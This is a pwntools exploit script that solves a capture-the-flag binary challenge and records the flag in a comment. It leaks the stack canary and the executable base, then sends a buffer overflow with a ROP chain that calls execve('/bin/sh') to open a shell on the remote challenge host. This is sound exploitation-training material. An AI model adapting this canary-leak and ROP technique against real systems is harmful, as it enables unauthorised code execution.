#!/usr/bin/env python3
# n00bz{jU5t_4_e3sy_m0de3rn_bufferoverflow}
# shouldn't it be just "an" easy modern bof?

from pwn import *

def set_buf(target, buf):
    target.sendlineafter(b'> ', b'1')
    target.sendlineafter(b'How much? ', str(len(buf)).encode())
    target.sendline(buf)

def get_canary(target):
    # canary has lowest byte set to 0, hence + 1
    CANARY_OFFSET = 40 + 1
    set_buf(target, b'x'*(CANARY_OFFSET))
    target.sendlineafter(b'> ', b'2')
    line = target.recvline(keepends=False)
    log.info(str(line))
    canary_bytes = line[CANARY_OFFSET:CANARY_OFFSET + 7] # lsb is 0, so 7 bytes in total
    canary = int.from_bytes(canary_bytes, byteorder='little')
    log.info(f'canary: {hex(canary)}')
    canary = canary << 8
    log.info(f'canary: {hex(canary)}')
    return canary

def get_img_base(target):
    CALL_MAIN_STACK_OFFSET = 40 + 8
    CALL_MAIN_IMG_OFFSET = 0xb230 # offset from base of executable
    set_buf(target, b'x'*(CALL_MAIN_STACK_OFFSET))
    target.sendlineafter(b'> ', b'2')
    line = target.recvline(keepends=False)
    log.info(str(line))
    call_main_addr_bytes = line[CALL_MAIN_STACK_OFFSET:]
    call_main_addr = int.from_bytes(call_main_addr_bytes, byteorder='little')
    log.info(f'call_main: {hex(call_main_addr)}')
    base = call_main_addr - CALL_MAIN_IMG_OFFSET
    log.info(f'base: {hex(base)}')
    return base

def gen_rop(base):
    # generated by ropper
    # $ ropper --file chall --chain execve
    from struct import pack

    p = lambda x : pack('Q', x)

    rebase_0 = lambda x : p(x + base)

    rop = b''

    rop += rebase_0(0x00000000000219e3) # 0x00000000000219e3: pop r13; ret;
    rop += b'//bin/sh'
    rop += rebase_0(0x000000000000a41b) # 0x000000000000a41b: pop rbx; ret;
    rop += rebase_0(0x00000000000eb000)
    rop += rebase_0(0x000000000008ab55) # 0x000000000008ab55: mov qword ptr [rbx], r13; pop rbx; pop rbp; pop r12; pop r13; ret;
    rop += p(0xdeadbeefdeadbeef)
    rop += p(0xdeadbeefdeadbeef)
    rop += p(0xdeadbeefdeadbeef)
    rop += p(0xdeadbeefdeadbeef)
    rop += rebase_0(0x00000000000219e3) # 0x00000000000219e3: pop r13; ret;
    rop += p(0x0000000000000000)
    rop += rebase_0(0x000000000000a41b) # 0x000000000000a41b: pop rbx; ret;
    rop += rebase_0(0x00000000000eb008)
    rop += rebase_0(0x000000000008ab55) # 0x000000000008ab55: mov qword ptr [rbx], r13; pop rbx; pop rbp; pop r12; pop r13; ret;
    rop += p(0xdeadbeefdeadbeef)
    rop += p(0xdeadbeefdeadbeef)
    rop += p(0xdeadbeefdeadbeef)
    rop += p(0xdeadbeefdeadbeef)
    rop += rebase_0(0x0000000000009c6a) # 0x0000000000009c6a: pop rdi; ret;
    rop += rebase_0(0x00000000000eb000)
    rop += rebase_0(0x000000000001787e) # 0x000000000001787e: pop rsi; ret;
    rop += rebase_0(0x00000000000eb008)
    rop += rebase_0(0x0000000000009b6f) # 0x0000000000009b6f: pop rdx; ret;
    rop += rebase_0(0x00000000000eb008)
    rop += rebase_0(0x00000000000621c7) # 0x00000000000621c7: pop rax; ret;
    rop += p(0x000000000000003b)
    rop += rebase_0(0x000000000002e7f4) # 0x000000000002e7f4: syscall; ret;
    return rop

target = remote('challs.n00bzunit3d.xyz', 31908)

canary = get_canary(target)
img_base = get_img_base(target)

set_buf(target,
        b'x' * 40 + # buffer (+ padding?)
        p64(canary) + # canary
        b'x' * 8 + # saved rbp
        gen_rop(img_base)
        )

target.sendline(b'3')

target.interactive()
